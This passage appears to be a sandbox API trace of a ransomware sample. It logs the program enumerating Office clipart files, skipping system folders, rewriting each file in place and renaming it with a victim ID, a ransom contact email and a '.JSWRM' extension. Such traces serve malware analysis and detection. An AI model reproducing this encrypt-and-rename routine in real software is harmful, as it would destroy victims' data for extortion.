lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesRead=0x345e89c*=0xdb0, lpOverlapped=0x0) returned 1 [0092.294] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0092.294] WriteFile (in: hFile=0x314, lpBuffer=0x23fc98*, nNumberOfBytesToWrite=0xdb0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesWritten=0x345e898*=0xdb0, lpOverlapped=0x0) returned 1 [0092.294] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23fc98 | out: hHeap=0x1e0000) returned 1 [0092.294] CloseHandle (hObject=0x314) returned 1 [0092.294] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0092.294] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0092.294] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0092.294] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0092.294] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0092.294] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0092.294] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0092.294] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2e8 [0092.294] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2e8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0092.294] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2e8 | out: hHeap=0x1e0000) returned 1 [0092.294] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23dbc0 [0092.294] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247898 [0092.294] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dbc0 | out: hHeap=0x1e0000) returned 1 [0092.295] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0092.295] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01866_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01866_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01866_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01866_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0092.295] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247898 | out: hHeap=0x1e0000) returned 1 [0092.295] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0092.295] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0092.295] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf5f6d6e, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf5f6d6e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf61cf5d, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x27e0, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="NA02009_.WMF", cAlternateFileName="")) returned 1 [0092.295] lstrcmpiW (lpString1="NA02009_.WMF", lpString2=".") returned 1 [0092.295] lstrcmpiW (lpString1="NA02009_.WMF", lpString2="..") returned 1 [0092.295] lstrcmpiW (lpString1="NA02009_.WMF", lpString2="...") returned 1 [0092.295] lstrcmpiW (lpString1="NA02009_.WMF", lpString2="windows") returned -1 [0092.295] lstrcmpiW (lpString1="NA02009_.WMF", lpString2="recovery") returned -1 [0092.295] lstrcmpiW (lpString1="NA02009_.WMF", lpString2="perflogs") returned -1 [0092.295] lstrcmpiW (lpString1="NA02009_.WMF", lpString2="documents and settings") returned 1 [0092.296] lstrcmpiW (lpString1="NA02009_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0092.296] lstrcmpiW (lpString1="NA02009_.WMF", lpString2="system volume information") returned -1 [0092.296] lstrcmpiW (lpString1="NA02009_.WMF", lpString2="msocache") returned 1 [0092.296] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241100 [0092.296] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA02009_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.296] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA02009_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NA02009_.WMF", lpUsedDefaultChar=0x0) returned 12 [0092.296] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241100 | out: hHeap=0x1e0000) returned 1 [0092.296] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0092.296] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA02009_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.296] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA02009_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NA02009_.WMF", lpUsedDefaultChar=0x0) returned 12 [0092.296] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0092.296] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x20ff90 [0092.296] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210028 | out: hHeap=0x1e0000) returned 1 [0092.296] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0092.296] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0092.296] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2101f0 [0092.296] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02009_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02009_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0092.296] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=10208) returned 1 [0092.296] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0092.296] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27e0) returned 0x24d210 [0092.297] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x27e0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x27e0, lpOverlapped=0x0) returned 1 [0092.298] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0092.299] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x27e0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x27e0, lpOverlapped=0x0) returned 1 [0092.299] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0092.299] CloseHandle (hObject=0x314) returned 1 [0092.299] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210e68 [0092.299] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0092.299] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0092.299] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0092.299] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0092.299] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0092.299] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0092.299] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3c0 [0092.299] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3c0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0092.299] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3c0 | out: hHeap=0x1e0000) returned 1 [0092.299] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d9c8 [0092.299] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247a88 [0092.299] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d9c8 | out: hHeap=0x1e0000) returned 1 [0092.299] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0092.299] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02009_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02009_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02009_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02009_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0092.300] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247a88 | out: hHeap=0x1e0000) returned 1 [0092.300] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210e68 | out: hHeap=0x1e0000) returned 1 [0092.300] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2101f0 | out: hHeap=0x1e0000) returned 1 [0092.300] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf68f613, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf68f613, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf68f613, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x918, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="NA02041_.WMF", cAlternateFileName="")) returned 1 [0092.300] lstrcmpiW (lpString1="NA02041_.WMF", lpString2=".") returned 1 [0092.300] lstrcmpiW (lpString1="NA02041_.WMF", lpString2="..") returned 1 [0092.300] lstrcmpiW (lpString1="NA02041_.WMF", lpString2="...") returned 1 [0092.300] lstrcmpiW (lpString1="NA02041_.WMF", lpString2="windows") returned -1 [0092.300] lstrcmpiW (lpString1="NA02041_.WMF", lpString2="recovery") returned -1 [0092.300] lstrcmpiW (lpString1="NA02041_.WMF", lpString2="perflogs") returned -1 [0092.300] lstrcmpiW (lpString1="NA02041_.WMF", lpString2="documents and settings") returned 1 [0092.300] lstrcmpiW (lpString1="NA02041_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0092.300] lstrcmpiW (lpString1="NA02041_.WMF", lpString2="system volume information") returned -1 [0092.300] lstrcmpiW (lpString1="NA02041_.WMF", lpString2="msocache") returned 1 [0092.300] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0092.300] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA02041_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.300] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA02041_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NA02041_.WMF", lpUsedDefaultChar=0x0) returned 12 [0092.300] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0092.300] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0092.300] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA02041_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.300] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA02041_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NA02041_.WMF", lpUsedDefaultChar=0x0) returned 12 [0092.300] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0092.301] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210158 [0092.301] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20ff90 | out: hHeap=0x1e0000) returned 1 [0092.301] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0092.301] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0092.301] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210028 [0092.301] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02041_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02041_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0092.301] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2328) returned 1 [0092.301] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0092.301] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x910) returned 0x20c6c0 [0092.301] ReadFile (in: hFile=0x314, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0x910, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345e89c*=0x910, lpOverlapped=0x0) returned 1 [0092.367] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0092.367] WriteFile (in: hFile=0x314, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0x910, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345e898*=0x910, lpOverlapped=0x0) returned 1 [0092.367] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20c6c0 | out: hHeap=0x1e0000) returned 1 [0092.367] CloseHandle (hObject=0x314) returned 1 [0092.368] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0092.368] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0092.368] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0092.368] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0092.368] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0092.368] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0092.368] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0092.368] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2a0 [0092.368] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2a0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0092.368] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2a0 | out: hHeap=0x1e0000) returned 1 [0092.368] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23dbc0 [0092.368] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2474b8 [0092.368] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dbc0 | out: hHeap=0x1e0000) returned 1 [0092.368] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0092.368] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02041_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02041_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02041_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02041_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0092.369] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2474b8 | out: hHeap=0x1e0000) returned 1 [0092.369] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0092.369] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210028 | out: hHeap=0x1e0000) returned 1 [0092.369] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf68f613, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf68f613, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf68f613, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x43c, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="NA02066_.WMF", cAlternateFileName="")) returned 1 [0092.369] lstrcmpiW (lpString1="NA02066_.WMF", lpString2=".") returned 1 [0092.369] lstrcmpiW (lpString1="NA02066_.WMF", lpString2="..") returned 1 [0092.369] lstrcmpiW (lpString1="NA02066_.WMF", lpString2="...") returned 1 [0092.369] lstrcmpiW (lpString1="NA02066_.WMF", lpString2="windows") returned -1 [0092.369] lstrcmpiW (lpString1="NA02066_.WMF", lpString2="recovery") returned -1 [0092.370] lstrcmpiW (lpString1="NA02066_.WMF", lpString2="perflogs") returned -1 [0092.370] lstrcmpiW (lpString1="NA02066_.WMF", lpString2="documents and settings") returned 1 [0092.370] lstrcmpiW (lpString1="NA02066_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0092.370] lstrcmpiW (lpString1="NA02066_.WMF", lpString2="system volume information") returned -1 [0092.370] lstrcmpiW (lpString1="NA02066_.WMF", lpString2="msocache") returned 1 [0092.370] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0092.370] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA02066_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.370] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA02066_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NA02066_.WMF", lpUsedDefaultChar=0x0) returned 12 [0092.370] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0092.370] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241100 [0092.370] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA02066_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.370] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA02066_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NA02066_.WMF", lpUsedDefaultChar=0x0) returned 12 [0092.370] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241100 | out: hHeap=0x1e0000) returned 1 [0092.370] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2103b8 [0092.370] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210158 | out: hHeap=0x1e0000) returned 1 [0092.370] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0092.370] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0092.370] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210158 [0092.370] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02066_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02066_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0092.371] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=1084) returned 1 [0092.371] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0092.371] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x430) returned 0x230a00 [0092.371] ReadFile (in: hFile=0x314, lpBuffer=0x230a00, nNumberOfBytesToRead=0x430, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x230a00*, lpNumberOfBytesRead=0x345e89c*=0x430, lpOverlapped=0x0) returned 1 [0092.373] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0092.373] WriteFile (in: hFile=0x314, lpBuffer=0x230a00*, nNumberOfBytesToWrite=0x430, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x230a00*, lpNumberOfBytesWritten=0x345e898*=0x430, lpOverlapped=0x0) returned 1 [0092.373] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x230a00 | out: hHeap=0x1e0000) returned 1 [0092.373] CloseHandle (hObject=0x314) returned 1 [0092.373] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210d38 [0092.373] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0092.373] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0092.373] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d298, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0092.373] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0092.373] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0092.373] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0092.373] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3c0 [0092.373] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3c0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0092.373] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3c0 | 